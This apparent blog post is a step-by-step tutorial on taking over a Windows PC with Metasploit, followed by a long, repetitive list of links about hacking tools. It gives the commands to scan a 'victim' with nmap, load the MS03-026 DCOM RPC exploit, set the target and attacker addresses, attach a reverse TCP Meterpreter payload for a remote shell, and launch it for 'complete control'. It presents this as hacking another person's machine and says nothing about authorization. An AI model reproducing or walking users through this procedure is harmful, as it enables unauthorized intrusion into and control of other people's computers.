Tuesday, May 30, 2023

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

More articles


  1. How To Make Hacking Tools
  2. Hack Tool Apk
  3. Hack Rom Tools
  4. Pentest Tools Open Source
  5. Hacking Tools Name
  6. Pentest Tools Download
  7. Hack Tools Github
  8. Hacking Tools Hardware
  9. Termux Hacking Tools 2019
  10. New Hack Tools
  11. Top Pentest Tools
  12. Hacking Tools Windows 10
  13. Hacker Tools Online
  14. How To Install Pentest Tools In Ubuntu
  15. Install Pentest Tools Ubuntu
  16. Hack Tools Github
  17. Hacker Tools
  18. Hacking Tools Windows 10
  19. Usb Pentest Tools
  20. Pentest Box Tools Download
  21. Hacking Tools Kit
  22. Pentest Tools For Ubuntu
  23. Hacker Tools Software
  24. Pentest Tools Website
  25. Pentest Tools Review
  26. Hacker Tool Kit
  27. Pentest Tools Apk
  28. Hacker Tools For Windows
  29. Hacking Tools For Windows 7
  30. Pentest Tools For Android
  31. How To Hack
  32. Blackhat Hacker Tools
  33. Hacker
  34. Hacking Tools For Pc
  35. Easy Hack Tools
  36. What Is Hacking Tools
  37. Hack Tools For Windows
  38. Pentest Tools
  39. Pentest Tools Open Source
  40. Hacking Tools For Windows 7
  41. Hacker Tools Mac
  42. What Are Hacking Tools
  43. Nsa Hacker Tools
  44. Ethical Hacker Tools
  45. Pentest Tools For Ubuntu
  46. Nsa Hack Tools Download
  47. Hacker Tools Apk
  48. Pentest Tools Open Source
  49. Hacker Tools Mac
  50. Hacking App
  51. Hacker Tools For Ios
  52. Pentest Tools For Windows
  53. Pentest Tools Alternative
  54. Wifi Hacker Tools For Windows
  55. What Is Hacking Tools
  56. Github Hacking Tools
  57. Hacker Tools 2020
  58. Hacking Tools And Software
  59. Hacker Tools 2019
  60. Hacking Apps
  61. New Hacker Tools
  62. Hacking Tools Github
  63. Hack Website Online Tool
  64. Hack Tools Download
  65. Hacking Tools For Pc
  66. Hack Tool Apk No Root
  67. Hack App
  68. Hack Tools 2019
  69. Nsa Hack Tools Download
  70. Hacking Tools Software
  71. Pentest Automation Tools
  72. Hacking Tools For Beginners
  73. Nsa Hack Tools
  74. How To Hack
  75. Hack Apps
  76. Hacker Tools Hardware
  77. Install Pentest Tools Ubuntu
  78. Hacker Tools For Ios
  79. Hacker
  80. Beginner Hacker Tools
  81. Pentest Tools Port Scanner
  82. Tools For Hacker
  83. Hackers Toolbox
  84. Pentest Tools Alternative
  85. Hacker Tools Online
  86. Android Hack Tools Github
  87. Hacking Tools Software
  88. Hacking Tools Free Download
  89. Hacker Tools For Windows
  90. Hacking Tools For Beginners
  91. Install Pentest Tools Ubuntu
  92. Pentest Tools
  93. Hacker Tools Apk Download
  94. Hack Apps
  95. Hacker Tools For Ios
  96. Hacker Tools Online
  97. Hacker Tools 2020
  98. Best Hacking Tools 2020
  99. New Hacker Tools
  100. Hacking Tools For Games
  101. Hackrf Tools
  102. Pentest Tools Alternative
  103. Pentest Tools Find Subdomains
  104. Hacker Tools Apk
  105. Hacking Tools Free Download
  106. Physical Pentest Tools
  107. Hacker Search Tools
  108. Pentest Tools Url Fuzzer
  109. Nsa Hack Tools
  110. Pentest Automation Tools
  111. Beginner Hacker Tools
  112. Hak5 Tools
  113. Hackrf Tools
  114. Hacker Tools For Pc
  115. Pentest Tools For Mac
  116. Physical Pentest Tools
  117. Hacker Tools For Mac
  118. Hacking Tools Name
  119. Hack Website Online Tool
  120. Hack Tools For Games
  121. Hacking Tools For Kali Linux
  122. Nsa Hack Tools
  123. Hacker Tool Kit
  124. Growth Hacker Tools
  125. Hack Website Online Tool
  126. Hacking Tools Name
  127. Hacking Tools Github
  128. Hacker Tools 2020
  129. Hacking Tools And Software
  130. Hacking Tools Software
  131. Blackhat Hacker Tools
  132. Hacking Tools For Windows 7
  133. Hacking Tools Hardware
  134. Physical Pentest Tools
  135. Hacking Tools For Kali Linux
  136. Hacker Tools List
  137. Hacking Tools For Mac
  138. Github Hacking Tools
  139. Pentest Tools
  140. Hacking Tools For Windows Free Download
  141. What Are Hacking Tools
  142. Hack Tools Github
  143. Hacking Tools Hardware

No comments:

Post a Comment